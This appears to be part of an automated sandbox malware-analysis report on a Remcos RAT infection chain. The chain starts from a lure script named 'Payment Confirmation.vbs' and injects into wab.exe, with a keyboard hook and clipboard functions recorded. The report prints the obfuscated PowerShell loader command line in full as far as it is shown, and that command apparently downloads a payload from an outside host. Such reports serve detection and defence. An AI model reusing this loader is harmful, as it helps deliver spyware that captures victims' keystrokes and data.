Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000000B.00000002.1848453717.0000000000584000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvB28E.tmp.11.dr String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 11_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 11_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 11_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 12_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 12_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 13_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_8080.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Sample has a suspicious name (potential lure to open the executable)
Source: Payment Confirmation.vbs Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9387
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9387
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9387 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9387 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Abnormal high CPU Usage
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00401806 NtdllDefWindowProc_W, 11_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004018C0 NtdllDefWindowProc_W, 11_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004016FD NtdllDefWindowProc_A, 12_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004017B7 NtdllDefWindowProc_A, 12_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00402CAC NtdllDefWindowProc_A, 13_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00402D66 NtdllDefWindowProc_A, 13_2_00402D66
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B12BEA2 2_2_00007FFB4B12BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B12B0F6 2_2_00007FFB4B12B0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B123FFA 2_2_00007FFB4B123FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B12208D 2_2_00007FFB4B12208D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DEB5C1 10_2_20DEB5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DF7194 10_2_20DF7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B040 11_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043610D 11_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00447310 11_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044A490 11_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040755A 11_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043C560 11_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B610 11_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044D6C0 11_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004476F0 11_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B870 11_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044081D 11_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00414957 11_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004079EE 11_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00407AEB 11_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044AA80 11_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00412AA9 11_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404B74 11_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404B03 11_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044BBD8 11_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404BE5 11_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00404C76 11_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00415CFE 11_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00416D72 11_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00446D30 11_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00446D8B 11_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406E8F 11_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00405038 12_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0041208C 12_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004050A9 12_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040511A 12_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0043C13A 12_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004051AB 12_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00449300 12_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040D322 12_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044A4F0 12_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0043A5AB 12_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00413631 12_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00446690 12_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044A730 12_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004398D8 12_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004498E0 12_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044A886 12_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0043DA09 12_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00438D5E 12_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00449ED0 12_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0041FE83 12_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00430F54 12_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004050C2 13_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004014AB 13_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00405133 13_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004051A4 13_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00401246 13_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040CA46 13_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00405235 13_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004032C8 13_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00401689 13_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00402F60 13_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
